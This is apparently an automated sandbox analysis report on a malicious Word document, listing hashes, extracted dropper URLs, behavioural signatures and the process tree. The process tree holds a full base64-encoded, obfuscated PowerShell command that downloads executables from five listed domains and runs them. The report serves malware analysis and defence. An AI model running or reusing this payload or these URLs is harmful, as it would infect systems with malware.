Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    28-09-2024 05:40

General

  • Target

    fb9c7a466c950f3c483a9e2d4eb05c55_JaffaCakes118.doc

  • Size

    70KB

  • MD5

    fb9c7a466c950f3c483a9e2d4eb05c55

  • SHA1

    1703d2c9619a4abdf81327c5fbf7c61aae404d33

  • SHA256

    ddfc1e80e8eb4c0ece096788b0ca80f9e2a2fa55011dd42e2deca7cf9e498c3e

  • SHA512

    8421edafe4076beea85089bb60cc0ef79f6b04258cc7c10de0e3769f34684b2be1326f621c90dba32af58f07e64580ee32cf6c1b43f2869be4ee506c3f116be0

  • SSDEEP

    768:CsqxsVHHnW/PtcrnMDqkFAGV7yg3yWRrtehxg7sJf1BG3jWRxdCj+3mHWCV:ZqwHHEPGQDpFHV7y0yWRry7RwGCV

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://aistra.lt/lTexwuBi/

exe.dropper

http://erikploeg.nl/KS/

exe.dropper

http://czarny-las.pl/nowa/vUcTmwA/

exe.dropper

http://datagroup.com.uy/lLcJnNv/

exe.dropper

http://ericalaurell.se/mUeQsM/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fb9c7a466c950f3c483a9e2d4eb05c55_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:620
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JAB7AHcAYABTAEMAcgBpAGAAUABUAH0AIAA9ACAALgAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAnAG4AZQB3AC0AbwBiAGoAJwAsACcAdAAnACwAJwBlAGMAJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACcAVwAnACwAJwBTAGMAcgBpAHAAdAAuAFMAaABlACcALAAnAGwAbAAnACkAOwAkAHsAdwBlAGAAQgBjAGwAYABJAGUAYABOAHQAfQAgAD0AIAAmACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAdAAnACwAJwBqAGUAYwAnACwAJwBuACcALAAnAGUAdwAtAG8AYgAnACkAIAAoACIAewAwAH0AewAzAH0AewAxAH0AewAyAH0AIgAgAC0AZgAgACcAUwB5AHMAdABlAG0ALgBOAGUAdAAnACwAJwBiAEMAbABpAGUAbgAnACwAJwB0ACcALAAnAC4AVwBlACcAKQA7ACQAewByAEEAbgBgAGQAYABPAE0AfQAgAD0AIAAmACgAIgB7ADEAfQB7ADIAfQB7ADMAfQB7ADAAfQAiACAALQBmACcAZQBjAHQAJwAsACcAbgAnACwAJwBlACcALAAnAHcALQBvAGIAagAnACkAIAAoACIAewAyAH0AewAwAH0AewAxAH0AIgAgAC0AZgAnAGEAJwAsACcAbgBkAG8AbQAnACwAJwByACcAKQA7ACQAewBVAGAAUgBsAFMAfQAgAD0AIAAoACIAewAyADMAfQB7ADgAfQB7ADkAfQB7ADEAOQB9AHsAMgA2AH0AewAxADEAfQB7ADIAMAB9AHsANAB9AHsAMAB9AHsAMwB9AHsAMQAwAH0AewAxADgAfQB7ADUAfQB7ADIANAB9AHsAMQA0AH0AewAxADMAfQB7ADIAMQB9AHsAMQB9AHsAMQA2AH0AewAxADcAfQB7ADIANwB9AHsAMgB9AHsAMQAyAH0AewAyADUAfQB7ADIAMgB9AHsANwB9AHsANgB9AHsAMQA1AH0AIgAgAC0AZgAnAC8ASwBTAC8ALABoAHQAdABwADoALwAvAGMAegAnACwAJwBnAHIAbwB1AHAALgBjAG8AbQAuAHUAeQAnACwAJwAvAGUAcgAnACwAJwBhACcALAAnAGgAdAB0AHAAOgAvAC8AZQByAGkAawBwAGwAbwBlAGcALgBuAGwAJwAsACcAcwAuAHAAbAAvAG4AbwB3AGEAJwAsACcAbQBVAGUAJwAsACcAZQBsAGwALgBzAGUALwAnACwAJwAvAGEAaQAnACwAJwBzAHQAcgBhACcALAAnAHIAbgB5ACcALAAnAGkALwAnACwAJwBpAGMAYQBsAGEAJwAsACcAaAB0AHQAcAA6ACcALAAnAFQAbQB3AEEALwAsACcALAAnAFEAcwBNAC8AJwAsACcALwAnACwAJwBsAEwAYwBKAG4ATgAnACwAJwAtAGwAYQAnACwAJwAuAGwAdAAnACwAJwAsACcALAAnAC8ALwBkAGEAdABhACcALAAnAHIAJwAsACcAaAB0AHQAcAA6AC8AJwAsACcALwB2AFUAYwAnACwAJwB1ACcALAAnAC8AbABUAGUAeAB3AHUAQgAnACwAJwB2AC8ALABoAHQAdABwADoALwAnACkALgAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAUwBwACcALAAnAGwAaQB0ACcAKQAuAEkAbgB2AG8AawBlACgAJwAsACcAKQA7ACQAewBOAEEAYABNAEUAfQAgAD0AIAAkAHsAcgBhAGAATgBgAGQATwBNAH0ALgAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAG4AJwAsACcAZQB4AHQAJwApAC4ASQBuAHYAbwBrAGUAKAAxACwAIAA2ADUANQAzADYAKQA7ACQAewBwAGEAYABUAEgAfQAgAD0AIAAkAHsAZQBuAHYAOgBgAFQARQBgAE0AUAB9ACAAKwAgACcAXAAnACAAKwAgACQAewBOAGAAQQBNAGUAfQAgACsAIAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAGUAeABlACcALAAnAC4AJwApADsAZgBvAHIAZQBhAGMAaAAoACQAewB1AGAAUgBsAH0AIABpAG4AIAAkAHsAVQBSAGAATABzAH0AKQB7AHQAcgB5AHsAJAB7AHcAYABFAEIAYwBMAEkAZQBgAE4AVAB9AC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACcAZQAnACwAJwBpAGwAJwAsACcARABvAHcAbgBsAG8AYQBkAEYAJwApAC4ASQBuAHYAbwBrAGUAKAAkAHsAdQBgAFIATAB9AC4AKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAJwBUACcALAAnAHQAcgBpAG4AZwAnACwAJwBvAFMAJwApAC4ASQBuAHYAbwBrAGUAKAApACwAIAAkAHsAUABhAGAAVABIAH0AKQA7AC4AKAAiAHsAMAB9AHsAMQB9AHsAMgB9AHsAMwB9ACIAIAAtAGYAJwBTAHQAYQByAHQALQBQACcALAAnAHIAbwBjACcALAAnAGUAJwAsACcAcwBzACcAKQAgACQAewBwAGEAYABUAEgAfQA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsAJgAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAnAHcAcgBpACcALAAnAGUALQBoAG8AcwB0ACcALAAnAHQAJwApACAAJAB7AF8AfQAuACIAZQBgAHgAQwBlAHAAYABUAEkAbwBOACIALgAiAE0ARQBgAHMAcwBgAEEAZwBlACIAOwB9AH0ADQAKAA==
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2804
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2712

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      ab050efca36752c94170edd33083e718

      SHA1

      2af053efcebea3dc3b245d9260b5b6206dca2843

      SHA256

      8f754631e0145f7b925a26d3b968bba7284020eec749ffdf5de33a5903c23657

      SHA512

      ce0d15e275ad9f8ab03b4ab3dc6487775c90af3b8bae329ac9d7dbc3e373f385dde1772687686ff4a3a35305a3f28ee779b59a8ed2c262634402151ea19749b4

    • memory/620-13-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/620-4-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/620-27-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/620-43-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/620-6-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/620-7-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/620-9-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/620-11-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/620-10-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/620-12-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/620-8-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/620-0-0x000000002F971000-0x000000002F972000-memory.dmp

      Filesize

      4KB

    • memory/620-65-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/620-2-0x0000000070EFD000-0x0000000070F08000-memory.dmp

      Filesize

      44KB

    • memory/620-5-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/620-42-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/620-33-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/620-26-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/620-24-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/620-19-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/620-47-0x0000000070EFD000-0x0000000070F08000-memory.dmp

      Filesize

      44KB

    • memory/620-48-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/620-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/620-63-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/620-64-0x0000000070EFD000-0x0000000070F08000-memory.dmp

      Filesize

      44KB

    • memory/620-23-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB